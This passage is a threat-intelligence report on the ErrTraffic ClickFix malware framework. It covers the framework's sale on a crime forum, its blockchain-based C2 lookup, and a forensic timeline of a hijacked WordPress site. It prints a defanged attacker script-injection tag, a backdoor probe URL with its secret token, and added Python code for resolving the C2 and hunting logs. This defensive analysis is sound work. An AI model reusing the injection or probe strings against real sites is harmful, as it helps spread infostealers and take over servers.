Unveiling ErrTraffic: inside a growing ClickFix malware distribution framework
Author: blog.sekoia.io, 2026-06-16 05:54:26

This article was originally distributed as a private report to our customers on 2 June 2026.

Introduction

As part of our threat intelligence and cybercrime mitigation efforts, the Sekoia TDR team actively monitors malware distribution campaigns leveraging the “ClickFix” social engineering technique. Consequently, we conducted an in-depth analysis of the ErrTraffic framework, a central component of this ecosystem.

Documented in late 2025 by HudsonRock, ErrTraffic is a JavaScript framework injected into compromised WordPress sites to deliver ClickFix lures. Operated under the Malware-as-a-Service (MaaS) model, it integrates a Traffic Distribution System (TDS) function. Similar to the ClearFake threat, it employs the EtherHiding technique as Dead Drop Resolver (DDR) to conceal its command and control (C2) infrastructure within the blockchain.

Operational analysis of this threat enabled the TDR team to identify two distinct ErrTraffic clusters. Through forensic investigations on targeted WordPress servers, we documented the toolkit used by attackers to compromise these servers and maintain persistence. Further, we uncovered an additional distribution campaign involving deceptive websites impersonating AI tools and platforms.

This report details the ErrTraffic threat and its associated ecosystem, highlighting three specific campaigns and their operators’ arsenal. Finally, it provides several analytical hypotheses regarding the MaaS operations and the organisation of these affiliate groups.

ErrTraffic: ClickFix framework leveraging EtherHiding

ErrTraffic is a malicious JavaScript framework primarily injected into compromised WordPress sites to display the ClickFix lure and subsequently deliver malware to visitors. This framework is sold as a MaaS accompanied by a malicious WordPress plugin that facilitates deployment and an administration panel for managing payloads, statistics, geolocation-based filtering, and other features. ErrTraffic’s operator also sells the source code “as-is”.

The following are examples of ClickFix lures delivered by the ErrTraffic framework and displayed to visitors on compromised or adversary-controlled websites.

Figure: ErrTraffic ClickFix lures

This turnkey TDS enables affiliates to spread malicious payloads effectively through compromised infrastructures or other adversary-controlled infrastructure.

Since its first version documented in late 2025 by HudsonRock, ErrTraffic went through several iterations. ErrTraffic v3, documented by LevelBlue in April 2026, uses the EtherHiding technique as DDR. The injected script on compromised WordPress sites queries a smart contract on a blockchain to retrieve the ErrTraffic C2 server. This mechanism allows the attackers to rotate infrastructure without redeploying code across thousands of compromised sites and helps prevent blocking by security solutions through regular updates.

Malware-as-a-Service operations on Exploit.IN

Figure: ErrTraffic advertising by LenAI

Since at least December 2025, the threat actor operating under the handle LenAI has advertised and sold the ErrTraffic framework under a MaaS model, on the Exploit.IN cybercrime forum and Telegram.

ErrTraffic’s pricing model evolved during the first half of 2026. Monthly subscription fees rose from $300 to $380, and the price of the source code doubled from $1,500 in January to $3,000 in April, reaching $4,500 when lifetime updates and support were included. The subscription model includes a limited number of rental spots, restricting access to a selected group of clients, and operating on a queue-based system. This operating mode is typical for TDS used to spread malware, as it prevents excessive exposure to multiple threat actors that could attract security researchers’ attention, increase detection rate, and thus lower the framework’s infection rate. Additionally, the user LenAI offers vetted cybercriminals a free one-day trial and a one-day refund on rentals.

Notably, LenAI has recently updated its business strategy: originally offering subscriptions ranging from one day to one month, ErrTraffic subscriptions are now sold from one month to six months. TDR analysts assess with high confidence that this shift underscores a lucrative and efficient cybercrime business model, as well as its successful establishment within the traffic distribution ecosystem.

LenAI’s thread advertising ErrTraffic on Exploit.IN primarily consists of posts showcasing new features, including:

  • A WordPress plugin facilitating deployment of the malicious framework on compromised sites.
  • Obfuscation and encryption for the injected ErrTraffic script (using AES and JavaScript obfuscation).
  • The use of a Polygon smart contract for panel resolution.
  • Social engineering lures employing the ClickFix tactic (BSOD screen, reCAPTCHA, and Cloudflare Turnstile CAPTCHA) to distribute malicious commands.
  • A TDS implementing geofiltering, payload routing based on the HTTP Referer header, and OS detection supporting Windows and macOS hosts.
  • PowerShell command lines for downloading the malicious payload.
  • A statistics module for tracking visits, delivery, and execution.

Alleged ErrTraffic affiliates on Exploit.IN

By 20 May 2026, ten Russian-speaking threat actors and one English-speaking threat actor had participated in the ErrTraffic thread on Exploit.IN: Ghost_devil, Dummy, mudila, willard, MasonDex, yayo, Jesse_D, Vasyavasilyev, Specta666, mtd, and tope (English-speaking). They either recommended the service or expressed interest. Several participants shared positive feedback, praising LenAI’s professional and helpful support. Other forum posts highlighted the project’s quality and strong conversion rate, which corresponds to the percentage of successful infections relative to the number of visitors. For example, the user mudila stated a “10% rate, which is impressive” (translated from Russian).

Alleged ErrTraffic affiliates are mostly active in discussion threads concerning malware distribution. Most have engaged in threads covering malware (crypters, infostealers, RATs) for the Windows, macOS and Android platforms. Several also showed interest in traffic, including Google Ads and YouTube Ads for malvertising, cloaking services (TDS), buying or selling Pay-Per-Install (PPI) services, or recruiting traffers.

Notably, in November 2025, the user mtd began advertising a PPI service for Windows and macOS payloads, offering “traffic” worldwide, specifically in the United States, Canada, Europe, and Australia. On 19 April 2026, the cybercriminal posted the following feedback in the ErrTraffic thread, demonstrating mtd’s loyalty as a customer:

“So far, the only product that actually gives a normal conversion rate and does not catch clickfix flags every 5 minutes. I recommend you to work.” (translated from Russian)

Based on mtd’s activities on Exploit.IN, we can reasonably hypothesise that the threat actor leverages ErrTraffic to distribute malware as part of its PPI service. This hypothesis aligns with the framework’s capabilities, which allow affiliates to deliver payloads based on the victim’s geolocation, offering “traffic” tailored by location.

ErrTraffic clusters

Our investigation of compromised WordPress sites allowed us to identify two main ErrTraffic clusters:

  • “Analytics” cluster
  • “Beer” cluster

The “Analytics” ErrTraffic cluster, previously documented by LevelBlue and other threat reports, relies on the Polygon blockchain and the smart contract address 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 to retrieve the C2 domains, and fetched Vidar infostealer payloads during April and May 2026.

The “Beer” ErrTraffic cluster interacts with the Polygon blockchain by querying various public RPC endpoints, mainly Quicknode. Several smart contract addresses are used, depending on the deployed ErrTraffic framework instance, to retrieve C2 domains predominantly characterised by the .beer TLD. This cluster distributes several malware families, including infostealers such as Vidar, Stealc, Remus and Salat.

Both clusters rely on compromised WordPress sites to inject ErrTraffic’s malicious JavaScript that displays the ClickFix lure. TDR analysts conducted forensic analysis on a few compromised WordPress sites to recover the backdoors used to deploy the framework. The analysis revealed distinct PHP backdoors: one used by the ErrTraffic “Analytics” cluster, and at least two used by campaigns leveraging the ErrTraffic “Beer” cluster. Additionally, our investigation determined that the attackers used harvested credentials to gain initial access to WordPress accounts and to install their backdoors. These campaigns, which deliver the ErrTraffic framework on compromised WordPress sites, are detailed in the “ErrTraffic campaigns” section.

Notably, investigations also revealed that some WordPress sites were compromised by both ErrTraffic clusters, indicating an operational overlap and potential competition between the operators.

“Analytics” ErrTraffic cluster

The “Analytics” ErrTraffic cluster uses a single, stable smart contract on the Polygon blockchain 0x08207B087F61d7e95E441E15fd6d40BEfd6eD308 to resolve its C2 infrastructure. On average, the C2 server is updated on a daily basis, with domains using unusual and suspicious TLDs, including .cfd, .club, .click, .cyou, .lat, .sbs, .shop, and .xyz.

A distinctive feature of the ErrTraffic framework of this cluster is the use of the /cf.js endpoint to fetch the script embedding the ClickFix lure from its C2 infrastructure. For this cluster, the initial ErrTraffic injection script is also Base64-encoded and XOR-obfuscated, and uses the EtherHiding technique to fetch the C2 domain. Subsequently, it retrieves the ClickFix lure from the /cf.js endpoint. Unlike the “Beer” ErrTraffic cluster, communications with the C2 are not obfuscated.
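The following is an added example (not ErrTraffic’s code and not Sekoia’s tooling) of how such an EtherHiding lookup works and how a defender can reproduce it: a single read-only eth_call to the contract, with the returned ABI-encoded string decoded into the C2 domain. The contract address is the one from the report; the RPC endpoint is an arbitrary public Polygon node, the 4-byte function selector is a placeholder, and the sample reply is constructed. These are assumptions: the real selector must be recovered from the injected script or the contract bytecode.

```python
"""Resolve an EtherHiding dead drop the way the injected script does: one
eth_call against the contract, then ABI-decode the returned string.
Added example, not ErrTraffic's or Sekoia's code."""
import json
import re
import urllib.request

CONTRACT = "0x08207B087F61d7e95E441E15fd6d40BEfd6eD308"  # "Analytics" cluster contract (from the report)
RPC_URL = "https://polygon-rpc.com"  # ASSUMPTION: any public Polygon JSON-RPC endpoint works here
SELECTOR = "0x00000000"  # ASSUMPTION: placeholder 4-byte selector; recover the real one (keccak256 of the
                         # getter's signature) from the injected script or the contract bytecode


def build_eth_call(contract=CONTRACT, selector=SELECTOR):
    """JSON-RPC body for a read-only call: no gas, no transaction, nothing written on-chain."""
    return {"jsonrpc": "2.0", "id": 1, "method": "eth_call",
            "params": [{"to": contract, "data": selector}, "latest"]}


def encode_abi_string(text):
    """ABI-encode a single `string` return value (used only to build the offline sample)."""
    data = text.encode()
    padded = data + b"\x00" * (-len(data) % 32)
    return "0x" + (32).to_bytes(32, "big").hex() + len(data).to_bytes(32, "big").hex() + padded.hex()


def decode_abi_string(result_hex):
    """Decode eth_call's `result`: 32-byte offset, 32-byte length, then UTF-8 bytes padded to 32."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64 or len(raw) % 32:
        raise ValueError("result is not an ABI-encoded string")
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    body = raw[offset + 32:offset + 32 + length]
    if len(body) != length:
        raise ValueError("ABI string is truncated")
    return body.decode("utf-8")


def extract_c2(value):
    """The dead drop may hold a bare domain or a full URL; return the host, defanged for reporting."""
    m = re.search(r"(?:https?://)?([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,})", value)
    return m.group(1).replace(".", "[.]") if m else None


def resolve_c2(rpc_url=RPC_URL, contract=CONTRACT, selector=SELECTOR):
    """Live lookup (needs network): POST the eth_call and decode the reply."""
    req = urllib.request.Request(rpc_url, data=json.dumps(build_eth_call(contract, selector)).encode(),
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        reply = json.load(resp)
    if "error" in reply:
        raise RuntimeError(reply["error"])
    return extract_c2(decode_abi_string(reply["result"]))


if __name__ == "__main__":
    # Constructed reply standing in for what the contract would return; no real C2 here.
    sample = encode_abi_string("https://c2-placeholder.invalid/cf.js")
    print(json.dumps(build_eth_call()))
    print(decode_abi_string(sample), "->", extract_c2(decode_abi_string(sample)))
```

Because the lookup is a plain eth_call, it leaves no on-chain trace, which is what makes it attractive to the operators; on the defensive side, a browser on a WordPress page issuing JSON-RPC POSTs to a blockchain RPC endpoint (Quicknode, in the “Beer” cluster’s case) is itself a signal worth alerting on.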

In April and May 2026, we observed the Vidar infostealer being exclusively distributed by this primary ErrTraffic cluster.

“Beer” ErrTraffic cluster

The “Beer” ErrTraffic cluster uses several smart contracts on the Polygon blockchain for its DDR, storing the C2 domains, which mostly used the .beer TLD in May 2026. This cluster relies on Quicknode RPC endpoints to interact with the Polygon smart contracts. We therefore named this cluster “Beer” after its consistent use of this unusual and suspicious TLD.

A distinctive feature of this cluster was the use of the /api/css.js endpoint to fetch the script embedding the ClickFix lure from its C2 infrastructure. This older injection method inserted two lines of code into the compromised web pages and did not rely on the EtherHiding DDR technique: a DNS-prefetch tag pre-resolves the ErrTraffic domain to speed up access, and a script tag loads the ErrTraffic injection script from an external JavaScript file via the /api/css.js endpoint. This technique is no longer in use.

<link rel="dns-prefetch" href="//llc-image-ico[.]click">
<script type="text/javascript" defer="" src="hxxps://llc-image-ico[.]click/api/css.js?b=45fcb62d&amp;r=731542" id="h42bd41a32a94-js">
</script>

Since March 2026, compromised WordPress sites have been directly injected with an obfuscated ErrTraffic JavaScript payload that uses Base64-encoding, XOR and text-encoding techniques to decode a second-stage script. This JavaScript queries the blockchain to resolve the C2 address, initiates the communications with the C2 using RC4 encryption, and retrieves the ClickFix lure after a few API requests to /api/index.php.

The command copied to the clipboard is retrieved via an API call following this URL pattern:

hxxps://[ERRTRAFFIC-DOMAIN]/api/index.php?a=ctx&os=windows&src=cloudflare&cb=[BROWSER]&ref=[REFERRER]&mode=download&rid=[RAY_ID]

The API returns a JSON object containing the RC4-encrypted command, with a key tied to the injection script. The resulting PowerShell command is particularly distinctive, featuring a pattern such as <# Code Verification: 656560395146 #> at the beginning of the string, which offers an effective pattern for detection and hunting.
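An added example (not ErrTraffic’s or Sekoia’s code) of the decryption and hunting step: an RC4 implementation, a decoder for the JSON reply, and a predicate matching the Code Verification marker. The JSON field name, the base64 transport of the ciphertext and the key are assumptions; the report only states that the reply is a JSON object carrying an RC4-encrypted command with a key tied to the injection script. The sample command is constructed and harmless.

```python
"""Decrypt an ErrTraffic "ctx" reply and hunt the resulting ClickFix command.
Added example, not ErrTraffic's or Sekoia's code. Constructed sample data only."""
import base64
import json
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Marker the report describes at the start of the delivered PowerShell string.
# <# ... #> is a PowerShell block comment, so the digits never affect execution.
VERIFICATION_RE = re.compile(r"<#\s*Code Verification:\s*\d{6,}\s*#>")


def decrypt_ctx_response(body: str, key: bytes, field: str = "data") -> str:
    """ASSUMPTION: the JSON field name and the base64 transport are placeholders;
    the report only says the reply is a JSON object holding an RC4-encrypted command."""
    obj = json.loads(body)
    return rc4(key, base64.b64decode(obj[field])).decode("utf-8", errors="replace")


def is_errtraffic_clickfix(command: str) -> bool:
    """Hunting predicate usable on clipboard dumps, RunMRU values or PowerShell script-block logs."""
    return bool(VERIFICATION_RE.search(command))


# --- constructed sample: a harmless command wrapped the way the API would wrap it ---
SAMPLE_KEY = b"constructed-rc4-key"          # the real key is tied to the injection script
SAMPLE_COMMAND = "<# Code Verification: 656560395146 #> Start-Process notepad.exe"
SAMPLE_RESPONSE = json.dumps({"data": base64.b64encode(rc4(SAMPLE_KEY, SAMPLE_COMMAND.encode())).decode()})

if __name__ == "__main__":
    cmd = decrypt_ctx_response(SAMPLE_RESPONSE, SAMPLE_KEY)
    print(cmd, "->", "ErrTraffic ClickFix" if is_errtraffic_clickfix(cmd) else "no marker")
```

The same regular expression applies to PowerShell script-block logs (Event ID 4104) and to the Explorer RunMRU registry values, where the Win+R commands pasted by ClickFix victims are recorded.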

While the “Analytics” ErrTraffic cluster uses a single smart contract, the “Beer” cluster appears to use a distinct smart contract for each payload. Indeed, we have observed different payloads being delivered depending on the specific smart contract utilised.

Payloads distributed by this cluster vary significantly across different smart contracts. We have identified both well-documented infostealer families (Vidar, Stealc, Remus, Salat) and undocumented ones, as well as RATs and loaders (e.g. SmokeLoader).

ErrTraffic campaigns

Investigation of the “Beer” and “Analytics” clusters revealed that several threat actors operate the ErrTraffic JavaScript framework to deliver their payloads. These cybercriminals are using various entry vectors to deploy ErrTraffic on websites and target a broad audience.

By analysing these clusters, we identified campaigns that compromise legitimate WordPress websites to inject ErrTraffic by using various backdoors, as well as a campaign suspected to be leveraging malvertising to spread an attacker-controlled website impersonating AI platforms (Google Antigravity, ChatGPT).

For the “Beer” cluster, TDR analysts assess with high confidence that each smart contract is associated with a distinct threat actor distributing their own payload. For compromised WordPress websites, we have also concluded that each attacker deploys its ErrTraffic framework version using their own tooling to inject web pages. Indeed, we identified several modi operandi for deploying the ErrTraffic JavaScript, such as distinct backdoors, various initial access attempts to compromise WordPress accounts, and different TTPs during the compromise.

As of May 2026, the following is an overview of the ErrTraffic campaigns associated with the “Beer” and “Analytics” clusters:

  • The “bintang” campaign, associated with one smart contract of the “Beer” ErrTraffic cluster.
  • The impersonated AI platform campaign, supposedly using malvertising to spread an attacker-controlled site impersonating Google Antigravity and delivering Danabot.
  • The “Analytics” campaign, which is the only one delivering the “Analytics” ErrTraffic cluster, spreading Vidar through a unique smart contract.

“Analytics” campaign

To understand the attacker’s methodology, we reached out to several victims to obtain forensic data. One of them responded favourably to our request, providing their Apache access logs as well as a complete dump of their WordPress instance.

Technical analysis revealed that the site was compromised in early March 2026, roughly two months prior to our investigation. The breach did not involve the exploitation of a technical vulnerability; instead, the attacker gained access using valid administrator credentials, likely harvested via an infostealer.

The subsequent infection aligns with the PHP backdoor documented by Monarx on 9 March 2026 and further highlighted by LevelBlue. The deployment process involved inserting a dropper into the active theme’s functions.php file, which then generated a malicious MU-plugin titled session-manager.php.

Acting as the primary backdoor, this plugin injects the ErrTraffic framework, displays the ClickFix lure to visitors, and provides a webshell. Log analysis confirmed consistent communication between the attacker and the server through this established webshell.

Compromise timeline

Credentials validation

On 7 March 2026, within an 80-second window, seven geographically distributed IP addresses were each observed submitting a single POST request to /wp-login.php. Six of these seven attempts resulted in the HTTP 302 redirection that WordPress issues after a successful authentication. None of the seven IPs submitted any subsequent requests.

The distribution across seven consumer residential ISPs spanning three countries is consistent with the use of a credential stuffing tool routed through a residential proxy service.

This behaviour, characterised by wide geographical distribution, CLI-based tooling, a single POST request without further exploitation, and a “single-hit” success pattern, is typical of a distributed validation service for stolen credentials.

First access and reconnaissance

On 8 March 2026, two North American residential IP addresses (96.178.187[.]175 and 96.181.156[.]219) successfully logged in to the WordPress site. The fact that both addresses succeeded on the first attempt rules out brute-force discovery. The attacker clearly possessed valid credentials, which is consistent with the suspicious activity observed on 7 March.

Both IPs used an identical User-Agent string: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 and their activity occurred within a window of only fourteen seconds. They had no prior history on the site and did not come back. The sequence of events following authentication was identical for both IP addresses:

  1. GET /wp-login.php?redirect_to=…&action=confirm_admin_email&wp_lang=en_US (HTTP 200): this page is served only to accounts with the manage_options capability. This confirms that the attacker had administrator-level access.
  2. GET /wp-login.php?…&remind_me_later=<token> (HTTP 302): dismisses the administrative confirmation prompt to proceed to the backend.
  3. GET /wp-admin/ (HTTP 200): successfully lands on the WordPress administrative dashboard.
  4. GET /wp-json/wp/v2/users/me?context=edit (HTTP 401): a REST API request fails because it carries no CSRF nonce (X-WP-Nonce header), so cookie authentication is not applied. This failure strongly suggests the attacker was using a CLI script rather than a standard browser executing WordPress JavaScript.
  5. GET /wp-admin/theme-install.php (HTTP 200): loads the theme installation page, which requires the install_themes capability. This validates that the account has the permissions necessary for the upcoming backdoor deployment.

The primary objective of this phase was the operational validation of the credentials harvested on 7 March. Beyond simple access, the attacker sought to confirm the “depth” of their privileges, specifically to ensure they possessed the necessary rights to modify themes and deploy the malicious backdoor.

Backdoor deployment

On 12 March 2026 the operator reconnected to the WordPress site from two new residential IP addresses: 172.59.242[.]93 and 68.60.174[.]238. Both IPs used the same User-Agent string (Chrome 144) previously observed on 8 March. The deployment operation was executed in four successive phases over a short duration.

Step 1 – Probing for an existing backdoor

The operator submitted a series of POST requests targeting the backdoor endpoints documented in the Monarx report, specifically:
POST /?wp_debug_session=a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e&mode=php.

This value is identical to the one referenced in the Monarx report, suggesting a secret shared between multiple victims of the same operation.

This phase demonstrates that the operator first checks the target’s pre-existing state to determine whether it has already been compromised. As all checks returned negative results, the target was confirmed to be not yet compromised, enabling the deployment to proceed.

Step 2 – Attempted CVE-2020-25213 exploitation

Eleven GET /wp-admin/admin.php?page=wp_file_manager requests were submitted in parallel with the other phases, all of which returned an HTTP 403 status. This URL is the administrative entry point for the WP File Manager plugin, which was affected by CVE-2020-25213 (an unauthenticated file upload leading to remote code execution). As the plugin is not installed on this instance, the attempt was ineffective.

The persistence of these eleven attempts, alongside the other actions, indicates that the operator possesses multiple pre-built attack chains: an automated plugin-based RCE path is attempted either as a fallback or as a complement to the credential-based method.

Step 3 – Authentication and stager deployment

The authentication sequence observed on 8 March is repeated. Next, the stager deployment phase proceeds as follows:

  1. GET /wp-admin/theme-editor.php: the operator loads the theme file editor with the default file (style.css) to retrieve the required CSRF nonce.
  2. GET /wp-admin/theme-editor.php?file=functions.php&theme=hello-elementor: the current content of the targeted file, functions.php from the hello-elementor theme, is loaded.
  3. POST /wp-admin/theme-editor.php: the new content is written to the server, with the dropper enclosed between the markers /* __mu_deployer__ */.
  4. GET /wp-admin/theme-editor.php?theme=hello-elementor&file=functions.php&wp_scrape_key=be61936de03f3842ee814fd80a10233a&wp_scrape_nonce=1436824527: this request is WordPress’s native safety mechanism. After any edit to a theme PHP file, core issues a loopback request to itself to make sure the modification does not cause a fatal PHP error on load. A successful request (HTTP 200) confirms that the malicious code is syntactically valid and passed WordPress validation.

Step 4 – Backdoor enabled

Five seconds after the write operation, the POST /?wp_debug_session=…&mode=php requests, which initially returned the full WordPress homepage, began returning short responses.

This signature confirms that the dropper executed upon the first page load and performed the following actions:

  • It decoded the Base64-encoded payload.
  • It wrote the MU-Plugin to wp-content/mu-plugins/session-manager.php.
  • The malicious code removed itself from the functions.php file, consistent with the behaviour described in the Monarx report.

The backdoor now intercepts requests via the init or plugins_loaded hooks, returning concise JSON responses instead of the standard WordPress HTML output.
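As an added example (not Sekoia’s tooling), the following script turns the timeline above into hunting logic over Apache combined-format logs: it isolates IPs whose only request is a single successful POST to /wp-login.php inside a short window (the 7 March validation pattern) and flags the wp_debug_session probes, the WP File Manager requests, the theme-editor.php write and the wp_scrape_key loopback, including the switch from full-page to short replies that marks the backdoor coming alive. The log lines are constructed with documentation IP ranges; tokens and sizes are placeholders.

```python
"""Hunt the 'Analytics' operator's footprint in Apache access logs.
Added example, not Sekoia's tooling; the log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: six single-shot successful logins plus one failure from seven
# IPs inside 80 s, two ordinary visitors/admins, then the operator's deployment run.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Mar/2026:14:02:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.7 - - [07/Mar/2026:14:02:14 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
203.0.113.55 - - [07/Mar/2026:14:02:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.23 - - [07/Mar/2026:14:02:41 +0000] "POST /wp-login.php HTTP/1.1" 200 4210 "-" "python-requests/2.31"
203.0.113.71 - - [07/Mar/2026:14:02:58 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.90 - - [07/Mar/2026:14:03:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
203.0.113.118 - - [07/Mar/2026:14:03:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31"
192.0.2.44 - - [07/Mar/2026:14:05:00 +0000] "GET / HTTP/1.1" 200 51233 "-" "Mozilla/5.0"
192.0.2.44 - - [07/Mar/2026:14:05:03 +0000] "GET /about/ HTTP/1.1" 200 40120 "-" "Mozilla/5.0"
192.0.2.80 - - [08/Mar/2026:09:00:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.80 - - [08/Mar/2026:09:00:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 80000 "-" "Mozilla/5.0"
198.51.100.200 - - [12/Mar/2026:11:30:00 +0000] "POST /?wp_debug_session=TOKEN&mode=php HTTP/1.1" 200 51233 "-" "Mozilla/5.0"
198.51.100.200 - - [12/Mar/2026:11:30:01 +0000] "GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.200 - - [12/Mar/2026:11:30:30 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.200 - - [12/Mar/2026:11:30:31 +0000] "GET /wp-admin/theme-editor.php?theme=hello-elementor&file=functions.php&wp_scrape_key=KEY&wp_scrape_nonce=NONCE HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
198.51.100.200 - - [12/Mar/2026:11:30:36 +0000] "POST /?wp_debug_session=TOKEN&mode=php HTTP/1.1" 200 27 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"')


def parse(log_text):
    """Apache combined format -> list of dicts (lines that do not parse are skipped)."""
    rows = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        row = m.groupdict()
        row["ts"] = datetime.strptime(row["ts"], "%d/%b/%Y:%H:%M:%S %z")
        row["status"] = int(row["status"])
        row["size"] = int(row["size"]) if row["size"].isdigit() else 0
        rows.append(row)
    return rows


def single_shot_logins(rows, window_s=80, min_ips=5):
    """IPs whose only request ever is one successful POST /wp-login.php (302),
    clustered inside window_s: the distributed credential-validation pattern."""
    per_ip = defaultdict(list)
    for r in rows:
        per_ip[r["ip"]].append(r)
    hits = sorted((rs[0] for rs in per_ip.values()
                   if len(rs) == 1 and rs[0]["method"] == "POST"
                   and rs[0]["path"].split("?")[0] == "/wp-login.php" and rs[0]["status"] == 302),
                  key=lambda r: r["ts"])
    best = []
    for i, first in enumerate(hits):                      # densest sliding window
        group = [r for r in hits[i:] if (r["ts"] - first["ts"]).total_seconds() <= window_s]
        if len(group) > len(best):
            best = group
    return sorted(r["ip"] for r in best) if len(best) >= min_ips else []


def deployment_indicators(rows):
    """Requests matching the probing, CVE-2020-25213 fallback and theme-editor write steps."""
    findings = []
    for r in rows:
        path, when = r["path"], r["ts"].isoformat()
        if "wp_debug_session=" in path:
            state = "backdoor answering (short reply)" if r["size"] < 512 else "probe, full page returned"
            findings.append((f"wp_debug_session: {state}", r["ip"], when))
        elif "page=wp_file_manager" in path and r["status"] == 403:
            findings.append(("WP File Manager probe (CVE-2020-25213 chain)", r["ip"], when))
        elif path.startswith("/wp-admin/theme-editor.php") and r["method"] == "POST":
            findings.append(("theme PHP file written via theme-editor.php", r["ip"], when))
        elif "wp_scrape_key=" in path:
            findings.append(("post-edit loopback check (theme PHP changed)", r["ip"], when))
    return findings


if __name__ == "__main__":
    rows = parse(SAMPLE_LOG)
    print("single-shot validated logins:", single_shot_logins(rows))
    for finding in deployment_indicators(rows):
        print(*finding)
```

The single-request filter is what separates this pattern from a legitimate administrator, who logs in and keeps browsing from the same address; the 512-byte threshold on wp_debug_session replies is a heuristic for the page-versus-JSON switch described above and should be tuned to the site’s real homepage size.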

Post exploitation

From the point of initial compromise, the attacker accessed the server daily via the webshell. All connections came from residential IP addresses using the same User-Agent (Chrome 144), consistent with the attacker’s backend routing its traffic through a residential proxy service.

While the logs do not capture the data sent via POST, the small size of the requests suggests they probably serve as a form of health check. We also observed more intensive traffic on specific dates, notably 29 March and 6 May. This activity corresponds to a redeployment of the ErrTraffic framework, almost certainly representing an update to the ClickFix injection script mechanism.

Among other actions, the attacker modified the following files:

  • .user.ini: the auto_prepend_file directive was used to load a hidden PHP script. This script exfiltrates cookies to the domain webanalytics-cdn[.]sbs.
  • .htaccess: instructions were added to disable caching, ensuring that malicious scripts and injections are served fresh to every visitor.

Backdoor

In addition to implementing the ErrTraffic TDS framework, session-manager.php is a multi-functional PHP implant deployed as a WordPress MU-Plugin. This category of plugin is automatically loaded by the CMS without explicit activation and cannot be disabled through the administration interface. The infection begins with a Base64-encoded dropper that writes the payload to the wp-content/mu-plugins/ directory to ensure automatic execution on every request.

The implant also includes the following features:

  • Anti-detection: The mechanism inspects the User-Agent of incoming requests for signatures of known security tools (such as Wordfence, Sucuri, WPScan, Nessus, Nikto, and Burp). If detected, it suspends all malicious blocks using a WordPress transient for 30 minutes, rendering the plugin inert during scans.
  • Credential harvesting: Credentials are harvested via a hook on the WordPress authentication process. Every login attempt is intercepted, and the credentials are stored redundantly in files disguised as images. Since the image name and path remain consistent across installations, anyone can retrieve credentials from any WordPress site compromised by this specific backdoor by requesting that path.
  • Webshell: Three independent remote code execution channels are available: a GET parameter authenticated by a secret key, an HMAC cookie with a time-window, and a REST API endpoint accepting POST requests via an X-WP-Session header. These webshells expose primitives for shell execution, PHP evaluation, file operations, and direct SQL queries. A notable OPSEC flaw is the reuse of an identical authentication key across all compromised sites.
  • Persistence: Persistence is maintained through seven distinct layers: a full copy of the MU-Plugin in the database, a credential harvester injected into wp-login.php (restored hourly), a stub in the active theme’s functions.php, five “scatter” PHP files hidden in legitimate directories, and the disabling of automatic updates. Each scatter stub can, upon authenticated request, restore any other component, create a hidden administrator account, or update its own codebase.
  • Analytics: A JavaScript beacon is placed in the footer of every public page, transmitting visitor metadata to C2 domains (webanalytics-cdn).
  • Skimming: A PHP component functions as a skimmer specifically targeting WooCommerce order data. With every new order, fields such as billing_first_name, billing_email, billing_phone, billing_country, order_total, and order_currency are intercepted and saved to a dedicated table. This approach follows classic Magecart logic but utilises native WordPress hooks rather than a client-side injected JavaScript skimmer.

The backdoor contains fixed paths and patterns that can be proactively scanned for. A scan performed on a sample of WordPress servers infected by the “Analytics” ErrTraffic cluster found the backdoor on the entire sample. In contrast, the backdoor was identified on fewer than 2% of a sample of sites from the “Beer” cluster. This disparity confirms that this specific backdoor is used exclusively by the “Analytics” cluster; the minor overlap is explained by servers cross-infected by both clusters, further demonstrating that they represent distinct campaigns.

“Bintang” campaign

We were able to obtain a data dump from a website compromised by the Beer cluster that is linked to the ErrTraffic smart contract 0xb36482fE794B895695914779Db3909b471D1aA43. The final payload delivered by this campaign was the Vidar infostealer. 

We dubbed this campaign “Bintang”, after the popular Indonesian beer to reflect the link between the “Beer” cluster and Indonesian patterns identified within the operator’s toolkit. 

Technical analysis reveals that the site was initially compromised on 5 March 2026 by the ErrTraffic “Beer” cluster, and subsequently on 29 March by the ErrTraffic “Analytics” cluster.

